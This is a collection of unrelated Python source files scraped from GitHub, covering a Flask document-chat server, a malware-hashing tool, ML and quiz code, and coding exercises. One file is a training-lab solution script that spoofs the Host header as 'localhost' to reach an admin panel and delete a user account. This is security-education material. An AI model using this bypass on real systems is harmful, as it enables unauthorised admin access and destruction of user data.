pathlib import Path\nimport time\n\n\nfrom utils import create_index, get_answer_from_index, clean_file, merge_pdfs\n\napp = Flask(__name__)\n\nfile_upload_path = \"./documents\"\nif not os.path.exists(file_upload_path):\n os.makedirs(file_upload_path)\n\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload_file():\n if not request.files:\n return \"Please send a POST request with a file\", 400\n\n filepaths = []\n filenames = []\n\n for file in request.files.values():\n uploaded_file = file\n filename = uploaded_file.filename\n filepath = os.path.join(file_upload_path, os.path.basename(filename))\n uploaded_file.save(filepath)\n filepaths.append(filepath)\n filenames.append(filename)\n\n if len(filepaths) > 1:\n print(\"filepaths\\n\", filepaths, \"\\n\")\n merged_filepath = os.path.join(file_upload_path, str(uuid.uuid4()) + \".pdf\")\n merge_pdfs(filepaths, merged_filepath)\n filepaths = [\n merged_filepath\n ] # Replace the original list with only the merged file\n filenames = [\n os.path.basename(merged_filepath)\n ] # Similarly update filenames to reflect the merged file\n\n index_name = (\n os.path.splitext(filenames[0])[0] if len(filenames) == 1 else str(uuid.uuid4())\n )\n\n index = create_index(filepaths, index_name)\n\n if index is None:\n return \"Failed to create index\", 500\n\n for filepath in filepaths:\n clean_file(filepath)\n\n return (\n make_response(\n {\n \"indexName\": index_name,\n \"indexType\": 
\"index\",\n \"fileNames\": filenames,\n }\n ),\n 200,\n )\n\n\n@app.route(\"/query\", methods=[\"GET\"])\ndef query_from_llama_index():\n try:\n message = request.args.get(\"message\")\n index_name = request.args.get(\"indexName\")\n index_type = request.args.get(\"indexType\")\n index_file_path = Path(file_upload_path) / f\"{index_name}.json\"\n\n if not os.path.isfile(index_file_path):\n return \"Index file does not exist\", 404\n\n if index_type == \"index\":\n answer = get_answer_from_index(message, index_name)\n\n return make_response(str(answer.response)), 200\n except Exception as e:\n return \"Error: {}\".format(str(e)), 500\n\n\n@app.errorhandler(500)\ndef handle_internal_server_error(e):\n response = {\"error\": \"Internal Server Error\", \"message\": str(e)}\n return jsonify(response), 500\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Chat Files\")\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Enable debug mode\")\n args = parser.parse_args()\n if not os.path.exists(file_upload_path):\n os.makedirs(file_upload_path)\n if os.environ.get(\"CHAT_FILES_MAX_SIZE\") is not None:\n app.config[\"MAX_CONTENT_LENGTH\"] = int(os.environ.get(\"CHAT_FILES_MAX_SIZE\"))\n app.run(port=5000, host=\"0.0.0.0\", debug=args.debug)\n","repo_name":"alexd725/ChatFiles","sub_path":"chatfiles/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8811018311","text":"# Basic password reset poisoning\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nfrom bs4 import BeautifulSoup\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_path(s, url):\n\trobots_path = '/robots.txt'\n\tprint('\\n[+] Navigating to:\\t%s' % robots_path)\n\tr = s.get(url + robots_path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tbackup_path = r.text.encode().split(b'\\n')[1].split(b' ')[1].decode()\n\tprint('\\n[+] Navigating to:\\t%s' % backup_path)\n\ndef find_admin_panel(s, url):\n\tprint('\\n[+] Trying to access to the Admin Panel...')\n\tadmin_path = url + '/admin'\n\tr = s.get(admin_path)\n\ttime.sleep(1)\n\tresponse = re.search(rb\"\\n (.*)\\n \", r.text.encode()).group(1).decode().strip()\n\tprint('[+] Server response:')\n\tprint(response)\n\ndef delete_carlos(s, url):\n\tprint('\\n[+] Trying to access to the Admin Panel as local User...')\n\tadmin_path = url + '/admin'\n\theaders = {'Host': 'localhost'}\n\tprint('[+] Using Header:\\t%s' % headers)\n\tr = s.get(admin_path, headers=headers)\n\ttime.sleep(1)\n\tdelete_path = url + '/admin/delete?username=carlos'\n\tif r.status_code == 200:\n\t\tprint('\\n[+] Trying to delete Carlos user...')\n\t\tr = s.get(delete_path, headers=headers)\n\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Basic password reset poisoning')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept 
IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find a way to delete Carlos account...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tget_path(s, url)\n\t\t\tfind_admin_panel(s, url)\n\t\t\tdelete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"HostHeader/exploit-lab02.py","file_name":"exploit-lab02.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39840598667","text":"##1 kod\r\nL = [3, 5, 4] ; L = L.sort()\r\n\r\n##mamy do czynienia z redundancją poniewaz sort soruje liste w miejscu wiec powinno sie to zapisac w ten sposob\r\nL = [3, 5, 4]\r\nL.sort()\r\n\r\n\r\n##2 kod\r\nx, y = 1, 2, 3 ##proba przypiisania dwom zmiennym trzech wartosci wiec blad\r\n\r\n##3 kod\r\nX = 1, 2, 3 ; X[1] = 4 ##blad braku możliwości zmiany X powinno sie zapisac\r\nX = (1, 4, 3)\r\n\r\n\r\n##4 kod\r\nX = [1, 2, 3] ; X[3] = 4 ##proba odwolanai sie do elementu poza zakresem listy\r\n\r\n##5 kod\r\nX = \"abc\" ; X.append(\"d\") ##metoda append jest dostepna dla list a nie lancuchow znakow\r\n\r\n##6 kod\r\nL = list(map(pow, range(8))) ##brak ostatniego nawiasu zamyykajacego","repo_name":"Dawid141/Python2023","sub_path":"cw_3/cw_3.2.py","file_name":"cw_3.2.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13114001453","text":"# -*- coding: utf-8 -*-\r\n# -----------------------------------------------------------------------\r\n# malget.py\r\n#\r\n# Authors: James Brahm, Matthew Rogers, Morgan Wagner, Jeramy Lochner,\r\n# Donte Brock\r\n# -----------------------------------------------------------------------\r\n# Copyright 2015 Dynetics, Inc.\r\n#\r\n# This file is a part of Malfunction\r\n#\r\n# Malfunction is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Malfunction is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. 
If not, see .\r\n# -----------------------------------------------------------------------\r\n\r\nimport argparse\r\nimport hashlib\r\nimport shutil\r\nimport subprocess\r\nimport ssdeep\r\nimport disassembler\r\n\r\n\r\ndef argparse_setup():\r\n \"\"\" Set up argparse arguments \r\n -o output -- output file for hashes\r\n -u unpack -- automatic unpacking\"\"\"\r\n\r\n parser = argparse.ArgumentParser(prog=\"python3 malget.py\")\r\n parser.add_argument(\"PATH\", help=\"Path to the binary or binaries\")\r\n parser.add_argument(\"-o\", \"--output\", type=str, help=\"output file for \"\r\n \"signatures\")\r\n parser.add_argument(\"-u\", \"--unpack\", action=\"store_true\",\r\n help=\"Unpacks packed executables before disassembly. \"\r\n \"Currently not implemented.\")\r\n return parser.parse_args()\r\n\r\n\r\ndef check_packed(filename, unpack):\r\n \"\"\" Linux only solution for checking if a file is unpacked\"\"\"\r\n\r\n if not shutil.which(\"grep\"):\r\n print(\"Cannot check if binary is packed\")\r\n return False\r\n\r\n package_breadcrumbs = [\"UPX\", \"aspack\", \"NSP\", \"NTKrnl\",\r\n \"PEC2\", \"PECompact2\", \"Thermida\", \"aPa2Wa\"]\r\n print(\"Determining if {0} is packed\".format(filename), end=\"...\")\r\n for packer in package_breadcrumbs:\r\n returncode = subprocess.call([\"grep\", packer, filename])\r\n if returncode == 0:\r\n print(\"That file is most likely packed by {0}\".format(packer))\r\n return True\r\n print(\"That file is likely not packed by common packers\")\r\n return False\r\n\r\n\r\ndef get_binary_hash(filename):\r\n \"\"\" Get the md5 hash of the file to put at the top of the document \"\"\"\r\n\r\n blocksize = 65536\r\n hasher = hashlib.md5()\r\n with open(filename, \"rb\") as afile:\r\n buf = afile.read(blocksize)\r\n while len(buf) > 0:\r\n hasher.update(buf)\r\n buf = afile.read(blocksize)\r\n return hasher.hexdigest()\r\n\r\n\r\ndef get_hash_tuple(functions, filename):\r\n \"\"\" Creates the binary tuple for use in Malfunction and Mallearn\r\n\r\n Results in the form: (Binary Hash, [**ssdeep hashes])\"\"\"\r\n\r\n function_hashes = []\r\n binary_hash = get_binary_hash(filename)\r\n for function in functions:\r\n function_hashes.append(ssdeep.hash(function))\r\n return (binary_hash, function_hashes)\r\n\r\n\r\ndef malget(filename, unpack):\r\n \"\"\" Callable function to run malget, which gets function\r\n signatures for malfunction\r\n\r\n filename - the name of the file to get signatures for\r\n unpack - boolean for automatic unpacking \"\"\"\r\n\r\n packed = check_packed(filename, unpack)\r\n if packed:\r\n print(\"That file is packed and may not disassemble correctly\")\r\n function_lists = disassembler.get_data(filename)\r\n functions, sizes = zip(*function_lists)\r\n # Passing the sizes up to Malfunction, since Malget won't use\r\n # them for anything if called by Mallearn\r\n return get_hash_tuple(functions, filename), sizes\r\n\r\n\r\ndef main():\r\n \"\"\" Determines the file type then outputs the binary md5 hash\r\n and the function fuzzy hashes\r\n\r\n Usage:\r\n python malget.py [FILE] \"\"\"\r\n\r\n args = argparse_setup()\r\n\r\n output_file = \"malgetOutput.txt\"\r\n if args.output:\r\n output_file = args.output\r\n binary_tuple, sizes = malget(args.PATH, args.unpack)\r\n with open(output_file, \"w\") as f:\r\n f.write(binary_tuple[0]+\"\\n\")\r\n for item in binary_tuple[1]:\r\n f.write(item + \"\\n\")\r\n print(\"Output to file {0}\".format(output_file))\r\n\r\nif __name__ == \"__main__\":\r\n 
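    # Entry point: parse the CLI arguments, disassemble the target binary, and
    # write its md5 followed by one ssdeep function hash per line.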
main()\r\n","repo_name":"Dynetics/Malfunction","sub_path":"malfunction/malget.py","file_name":"malget.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"53"} +{"seq_id":"21352610647","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n\n求出1~13的整数中1出现的次数,并算出100~1300的整数中1出现的次数?为此他特别数了一下1~13中包含1的数字有1、10、11、12、13因此共出现6次,但是对于后面问题他就没辙了。ACMer希望你们帮帮他,并把问题更加普遍化,可以很快的求出任意非负整数区间中1出现的次数。\n\nhttps://blog.csdn.net/yi_afly/article/details/52012593\n\"\"\"\n\nclass Solution:\n def NumberOf1Between1AndN_Solution(self, n):\n # write code here\n count = 0\n base = 1\n r = n\n while r > 0:\n weight = r % 10\n r //= 10\n count += r*base\n if weight == 1:\n count += (n%base) + 1\n elif weight > 1:\n count += base\n base *= 10\n\n return count\n\nif __name__ == '__main__':\n s = Solution()\n c = s.NumberOf1Between1AndN_Solution(514)\n print(c)\n \n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"11277968892","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\nclass Client:\r\n \"\"\"Classe qui gere les operations des clients dans la construction d'une random forest ferere\r\n \"\"\"\r\n\r\n def __init__(self, dataset=None) -> None:\r\n self.dataset = dataset\r\n self.forest = None\r\n self.labels = None\r\n self.test_dataset = None\r\n self.test_labels = None\r\n\r\n self.current_dataset = None\r\n self.current_labels = None\r\n \r\n self.cross_valid_dataset = None\r\n self.cross_valid_labels = None\r\n self.validation_dataset = None\r\n self.validation_labels = None\r\n\r\n def __bootstrap(self, x):\r\n \"\"\"Effectue un bootstap sur le dataset x\r\n\r\n Args:\r\n x (pd.Dataframe): le dataset utilise pour le bootstrap\r\n\r\n Returns:\r\n pd.Dataframe: Donnees selectionnees du dataset\r\n \"\"\"\r\n\r\n idx = np.random.choice(len(x) - 1, replace=True, size=len(x))\r\n return x.iloc[idx]\r\n\r\n def get_best_threshold(self, features, splits, current_tree):\r\n \"\"\"Obtient le couple feature, valeur de separation qui ameliore le plus\r\n l'indice de gini pour le dataset du client.\r\n\r\n Args:\r\n features (list): liste des features a evaluer\r\n splits (list): liste des valeurs de separation associees aux features\r\n current_tree (Node): Arbre actuellement developpe\r\n\r\n Returns:\r\n tuple: tuple contenant:\r\n str: nom de l'attribut selectionne\r\n int: nombre de donnees actuellement evalues\r\n \"\"\"\r\n\r\n # Separer les donnees en fonctions de l'arbre courant\r\n labels = self.current_labels\r\n dataset = self.current_dataset\r\n\r\n # Calcul du gini de l'ensemble actuel\r\n total_gini = Client.gini_impurity(labels)\r\n\r\n # Si rien est a separer\r\n if total_gini == 0:\r\n return \"pure\", 0\r\n if len(dataset) <= 2:\r\n return \"no-data\", 0\r\n\r\n # calcul de gini pour chaque feature\r\n ds_star = dataset[features]\r\n thresholds = pd.DataFrame([splits], columns=features)\r\n ginis = ds_star.apply(lambda col: Client.gini_gain(\r\n col, labels, thresholds, total_gini), 0).values\r\n\r\n # retourne l'attribut permetant d'avoir le meilleur \"gain de gini\", ainsi que le nombre\r\n # donnees dans le dataset courant\r\n\r\n i_best_gini = np.argmax(ginis)\r\n best_gini_feature = features[i_best_gini]\r\n n_data = 
len(labels)\r\n\r\n if ginis[i_best_gini] <= 0:\r\n return \"no-gain\", 0\r\n\r\n return best_gini_feature, n_data\r\n\r\n def get_leaf(self, current_tree):\r\n \"\"\"Obtient la distribution des classes pour un dataset\r\n\r\n Args:\r\n current_tree (Node): arbre actuellement evalue\r\n\r\n Returns:\r\n list: labels (cibles)\r\n \"\"\"\r\n \"\"\"Obtient la distribution des classes pour un dataset \r\n (possiblement juste la classe majoritaire si on decide d'utiliser un vote)\r\n\r\n :param current_tree: arbre actuellement evalue\r\n :type current_tree: Node\r\n \"\"\"\r\n # Separer les donnees en fonctions de l'arbre courant\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # retourner le nombre de valeurs perturbees pour chaque classe dans le dataset courant\r\n return labels\r\n\r\n def get_leaf_vote(self, current_tree):\r\n \"\"\"Obtient la classe majoritaire selon les cibles majoritaires chez les clients\r\n\r\n Args:\r\n current_tree (Node): arbre actuellement evalue\r\n\r\n Returns:\r\n tuple: tuple contenant les valeurs suivantes:\r\n label (cible) majoritaire\r\n nombre de labels au total\r\n \"\"\"\r\n\r\n # Separer les donnees en fonctions de l'arbre courant\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # retourner la cible majoritaire avec le nombre de donnees dans l'ensemble du dataset initial\r\n if len(labels) > 0:\r\n result, count = np.unique(labels, return_counts=True)\r\n\r\n return result[np.argmax(count)], len(self.labels)\r\n\r\n return \"\", 0\r\n\r\n def set_new_forest(self, random_forest):\r\n \"\"\"Modifie la randomForest du client\r\n\r\n Args:\r\n random_forest (Node): Nouvelle RandomForest\r\n \"\"\"\r\n self.forest = random_forest\r\n\r\n def get_federated_accuracy(self):\r\n \"\"\"Calcule la precision de l'arbre entraine de facon federe (self.forest)\r\n\r\n Returns:\r\n tuple: tuple contentant:\r\n float: justesse (accuracy)\r\n int: nombre de donnees dans l'ensemble de test\r\n \"\"\"\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.test_labels.copy()\r\n dataset = self.test_dataset.copy()\r\n res = self.forest.predict(dataset)\r\n\r\n accuracy = 1 - sum([int(value != labels[x])\r\n for x, value in enumerate(res)]) / len(labels)\r\n\r\n return accuracy, len(dataset)\r\n\r\n def get_local_accuracy(self):\r\n \"\"\"Calcule la precision d'un arbre entraine localement et teste localement\r\n\r\n Returns:\r\n tuple: tuple contentant:\r\n float: justesse (accuracy)\r\n int: nombre de donnees dans l'ensemble de test\r\n \"\"\"\r\n\r\n # Entrainer un modele de randomForest (scikit-learn) et retourner l'accuracy\r\n dt = RandomForestClassifier()\r\n dt.fit(self.dataset, self.labels)\r\n res = dt.predict(self.test_dataset)\r\n accuracy = 1 - sum([int(value != self.test_labels[x])\r\n for x, value in enumerate(res)]) / len(self.test_labels)\r\n return accuracy, len(self.test_dataset)\r\n\r\n 
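    # The two accuracy helpers above are deliberately parallel: the federated
    # score evaluates self.forest built collaboratively, while the local score
    # trains a private scikit-learn forest, so both can be compared on the
    # same held-out split.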
def get_local_model(self):\r\n \"\"\"Retourne un model entraine localement\r\n\r\n Returns:\r\n RandomForestClassifier: Model scikit-learn entraine localement\r\n \"\"\"\r\n dt = RandomForestClassifier()\r\n dt.fit(self.dataset, self.labels)\r\n return dt\r\n\r\n def get_thresholds(self, features, current_tree):\r\n \"\"\"Pour chaque features, recupere le min et le max, puis definit le threshold qui\r\n est un valeur entre le min et le max\r\n\r\n Args:\r\n features (list): Liste des features selectionnes par le master\r\n current_tree (Node): Arbre actuel (pour la separation des donnees)\r\n\r\n Returns:\r\n list: Array contenant une separation pour chaque feature\r\n \"\"\"\r\n \r\n # Calcul du dataset courant, en parcourant l'arbre jusqu'au noeud a developper\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # Afin d'eviter de recalculer pour get_best_threshold\r\n self.current_dataset = dataset\r\n self.current_labels = labels\r\n\r\n values = []\r\n for f in features:\r\n col = dataset[f]\r\n minimum = col.min()\r\n maximum = col.max()\r\n \r\n # S'il n'y a pas de donnees\r\n if np.isnan(minimum) or np.isnan(maximum):\r\n values.append(np.nan)\r\n else:\r\n values.append(np.random.default_rng().uniform(\r\n low=minimum, high=maximum))\r\n\r\n return values\r\n\r\n def get_features(self):\r\n \"\"\"Recupere les features (colonnes) du dataset du client sous forme de liste\r\n\r\n Returns:\r\n list: Liste des features du client\r\n \"\"\"\r\n\r\n return list(self.dataset.columns)\r\n\r\n def set_dataset(self, dataset, labels):\r\n \"\"\"Mise a jour du dataset (et des labels) du client\r\n\r\n Args:\r\n dataset (pd.DataFrame): dataset a modifier\r\n labels (list): liste des labels a modifier\r\n \"\"\"\r\n \"\"\"\r\n Mise a jour du dataset (et des labels) du client\r\n\r\n :param dataset: dataset a modifier\r\n :param labels: liste des labels a modifier\r\n \"\"\"\r\n dataset = dataset.reset_index(drop=True)\r\n self.labels = labels\r\n\r\n labels = pd.DataFrame(labels).reset_index(drop=True)\r\n \r\n # Selectionne les indexes qui seront dans l'ensemble d'entrainement\r\n train_idx = np.random.choice(\r\n len(dataset) - 1, replace=False, size=int(len(dataset) * 0.8))\r\n\r\n self.test_dataset = dataset.loc[~dataset.index.isin(\r\n train_idx)].copy()\r\n self.test_labels = labels.loc[~labels.index.isin(\r\n train_idx)].values.T[0]\r\n\r\n self.dataset = dataset.loc[train_idx].copy()\r\n self.labels = labels.loc[train_idx].values.T[0]\r\n \r\n def set_validation(self):\r\n dataset = self.dataset.reset_index(drop=True)\r\n labels = pd.DataFrame(self.labels).reset_index(drop=True)\r\n \r\n \r\n train_idx = np.random.choice(\r\n len(dataset) - 1, replace=False, size=int(len(dataset) * 0.8))\r\n\r\n # Definit l'ensemble de test et les cibles des 20% restants\r\n # (les donnees qui ne font pas partie de l'ensemble d'entrainement)\r\n self.validation_dataset = dataset.loc[~dataset.index.isin(train_idx)]\r\n self.cross_valid_labels = labels.loc[~labels.index.isin(train_idx)].values.T[0]\r\n\r\n self.cross_valid_dataset = dataset.loc[train_idx]\r\n self.cross_valid_labels = labels.loc[train_idx].values.T[0]\r\n return \r\n \r\n def unset_validation(self):\r\n self.validation_dataset = None\r\n self.cross_valid_labels 
","repo_name":"vincentlatourelle/apprentissage-distribue","sub_path":"RandomForest/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12221,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14054667595","text":"import argparse\nimport errno\nimport os\n\n\ndef arg_parser():\n    parser = argparse.ArgumentParser(\n        description=\"\"\"\n        Segment one or multiple audio files into `.csv` files,\n        which list all the detected speech segments as [START, END].\n        \"\"\"\n    )\n    group = parser.add_mutually_exclusive_group(required=True)\n    group.add_argument(\n        \"-w\",\n        \"--wavfile\",\n        type=file_path,\n        help=\"\"\"\n        Path to an audio file, e.g. `path/to/my/audiofile.wav`.\n        \"\"\",\n    )\n    group.add_argument(\n        \"-f\",\n        \"--wavfolder\",\n        type=dir_path,\n        help=\"\"\"\n        Path to a folder containing multiple wav files,\n        e.g. `path/to/folder/of/wav/files`.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--output_path\",\n        nargs=\"?\",\n        const=os.path.join(os.getcwd(), \"segments\"),\n        default=os.path.join(os.getcwd(), \"segments\"),\n        type=output_dir_path,\n        help=\"\"\"\n        Path of the folder to save predictions.\n        By default it will make a `segments` folder in\n        the root directory and save the segments there.\n        These will contain .csv files demarcating\n        the [START, END] of the detected speech segments.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-sr\",\n        \"--sameplerate\",\n        default=\"None\",\n        type=str,\n        help=\"\"\"\n        The desired sampling frequency of the audio files.\n        By default `None` is used, keeping the native sampling rate.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-e\",\n        \"--audio-extensions\",\n        nargs=\"+\",\n        default=[\"wav\"],\n        help=\"\"\"\n        The type of audio files to look for in a given directory,\n        e.g. 'aac', 'au', 'flac', 'm4a', 'mp3', 'ogg', 'wav'.\n        Default is just 'wav'.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-smf\",\n        \"--smoothing-merge-factor\",\n        default=5,\n        type=int,\n        help=\"\"\"\n        The window size ratio factor used for smoothing the final\n        decision boundary by merging close proximity segments.\n        Default is `5`, giving a window size of `sr/5`.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-sof\",\n        \"--smoothing-outlier-factor\",\n        default=10,\n        type=int,\n        help=\"\"\"\n        The window size ratio factor used for smoothing the final decision\n        boundary by removing small duration outlier segments.\n        Default is `10`, giving a window size of `sr/10`.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-t\",\n        \"--theta-scale\",\n        default=1.0,\n        type=float,\n        help=\"\"\"\n        The factor used to scale the final threshold `theta`.\n        Useful to strongly differentiate the final decision surface from the threshold.\n        Default is `1.0`.\n        \"\"\",\n    )\n    parser.add_argument(\n        \"-ent\",\n        \"--spectral-entropy\",\n        default=False,\n        type=bool,\n        help=\"\"\"\n        Weighs the ZFF evidences with the spectral entropy of the given audio\n        signal to further highlight speech regions.\n        Useful in noisy conditions. Default is `False`.\n        \"\"\",\n    )\n    args = parser.parse_args()\n    return args\n
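\n\n# Hypothetical usage sketch (argument names assumed from this module only):\n#\n#     args = arg_parser()\n#     print(args.output_path)        # e.g. <cwd>/segments\n#     print(args.audio_extensions)   # e.g. ['wav']\n#\n# arg_parser() reads sys.argv, so it is meant to be called from a CLI entry point.\n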
\n\ndef dir_path(path):\n    if os.path.isdir(path):\n        return path\n    elif path is None:\n        print(\n            \"\"\"\n            Please provide an input directory containing\n            audio files or else a single audio file.\n            \"\"\"\n        )\n    else:\n        print(f\"The directory {path} does not exist!\")\n        raise NotADirectoryError(path)\n\n\ndef file_path(path):\n    if os.path.isfile(path):\n        return path\n    else:\n        print(f\"The file {path} does not exist!\")\n        raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n\n\ndef output_dir_path(path):\n    if path == os.path.join(os.getcwd(), \"segments\"):\n        if not os.path.isdir(path):\n            os.makedirs(path)\n            return path\n        else:\n            return path\n    else:\n        if os.path.isdir(path):\n            return path\n        else:\n            print(f\"The directory {path} does not exist!\")\n            raise NotADirectoryError(path)\n","repo_name":"idiap/zff_vad","sub_path":"zff/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"17948630955","text":"from time import sleep\nimport os\nimport sys\nimport gspread\nfrom google.oauth2.service_account import Credentials\nfrom quiz import quiz_data\n\n\nSCOPE = [\n    \"https://www.googleapis.com/auth/spreadsheets\",\n    \"https://www.googleapis.com/auth/drive.file\",\n    \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('avengers_quiz')\nsales = SHEET.worksheet('leaderboard')\n\nuser_name = \"\"\n\nscore = 0\n\n\ndef clear_terminal():\n    \"\"\"\n    Pauses the terminal for 2 seconds and clears the terminal\n    \"\"\"\n    sleep(2)\n\n    os.system('clear')\n\n\ndef validate_user_name(user_name):\n    \"\"\"\n    Validates user_name input to see if it matches the criteria.\n    \"\"\"\n    if user_name == \"\":\n        print(\"Please don't enter an empty value!\\n\")\n    elif len(user_name) > 12:\n        print(\"Name shouldn’t be more than 12 characters long!\\n\")\n    elif len(user_name) < 3:\n        print(\"Name shouldn’t be less than 3 characters!\\n\")\n    else:\n        return True\n\n\ndef display_question(index, question, options):\n    \"\"\"\n    Print questions and loop through 
options array and print each value\n \"\"\"\n\n print(f\"Question {index}/10 \\n\")\n\n print(question + \"\\n\")\n\n for option in options:\n print(option)\n\n print(\"Please enter your answer (a, b, c, or d):\")\n\n\ndef check_answer(answer, question_answer):\n \"\"\"\n Checks the answers to the questions if both values are equal.\n One point will be added to the score, if the answer is correct.\n If the answer is wrong no points will be added.\n \"\"\"\n global score\n\n if answer.lower() == question_answer.lower():\n print(\"Correct answer!\\n\")\n\n score += 1\n else:\n print(\"Incorrect answer!\\n\")\n\n\ndef sort_by_score(elem):\n \"\"\"\n Sort the leaderboard list by the score value\n and returns the value into integer.\n \"\"\"\n return int(elem[1])\n\n\ndef quiz_information():\n \"\"\"\n Print the Avengers logo and information about the quiz.\n \"\"\"\n\n 